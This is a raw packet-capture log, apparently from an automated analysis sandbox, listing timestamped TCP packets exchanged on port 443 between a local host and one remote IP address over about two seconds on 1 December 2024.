                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.930934906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.930958033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.930979013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.936180115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.936201096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.936232090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.936237097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.936266899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.941447020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.941463947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.941521883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.941530943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.941539049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.941559076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.947166920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.947186947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.947215080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.947221041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.947248936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.947266102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.952100039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.952116966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.952155113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.952161074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.952182055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.952198982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.957881927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.957901001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.957933903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.957938910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.957967043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.957984924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:41.978452921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.116965055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.116997004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.117028952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.117036104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.117089987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.121860981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.121889114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.121927023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.121942997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.121963978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.122009993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.129426003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.132184982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.132203102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.132241964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.132246971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.132298946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.137223005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.137240887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.137294054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.137301922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.137367964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.142920017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.142937899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.142976999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.142983913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.143011093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.143034935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.148499966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.148514986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.148551941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.148557901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.148617983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.153537989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.153554916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.153620005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.153626919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.153700113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.159241915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.159260035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.159337044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.159337044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.159346104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.159416914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.164655924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.318231106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.318252087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.318339109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.318346977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.318392038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.323321104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.323335886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.323410034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.323410034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.323417902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.323455095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.333576918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.333604097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.333673000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.333688021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.333698034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.333729029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.338395119 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.338418961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.338443041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.338459015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.338470936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.338495970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.344155073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.344171047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.344244003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.344271898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.344377041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.349816084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.349855900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.349899054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.349914074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.349944115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.349945068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.355514050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.355529070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.355598927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.355618000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.358679056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.360546112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.360562086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.360610008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.360619068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.360688925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.362646103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.519589901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.519610882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.519727945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.519740105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.523068905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.526521921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.526554108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.526623011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.526633978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.526726961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.534846067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.534877062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.534989119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.534989119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.534998894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.538676023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.539800882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.539832115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.539918900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.539918900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.539927006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.542733908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.545495987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.545532942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.545589924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.545597076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.545634031 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.545634031 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.551126957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.551151991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.551217079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.551223993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.551265955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.551265955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.556813955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.556853056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.556894064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.556900978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.556936026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.556936026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.561742067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.561777115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.561872959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.561882019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.562019110 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.568490982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.720882893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.720911980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.720983982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.721009970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.721025944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.721298933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.726615906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.726645947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.726711988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.726735115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.726751089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.726782084 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.736217022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.736258984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.736330986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.736330986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.736352921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.736408949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.741667032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.741709948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.741769075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.741797924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.741808891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.742922068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.746618986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.746646881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.746720076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.746735096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.746746063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.747191906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.752217054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.752247095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.752279043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.752300024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.752321005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.754692078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.757930040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.757961035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.758012056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.758025885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.758064032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.758915901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.759560108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.763259888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.763287067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.763354063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.763354063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.763372898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.766701937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.773839951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.923629045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.923656940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.923758984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.923768997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.924679995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.929122925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.929148912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.929188013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.929198980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.929234982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.929234982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.940016031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.940043926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.940115929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.940129995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.940166950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.940658092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.944255114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.944288015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.944344997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.944355965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.944371939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.944631100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.949270964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.949299097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.949347019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.949354887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.949378014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.949384928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.955029011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.955055952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.955131054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.955144882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.955157995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.956645966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.960880995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.960908890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.960985899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.960985899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.961004019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.961066961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.965234041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.965615988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.965642929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.965708017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.965708017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.965723038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.968652010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:42.973611116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.123665094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.123697042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.123797894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:43.123807907 CET44349721142.132.252.48192.168.2.6
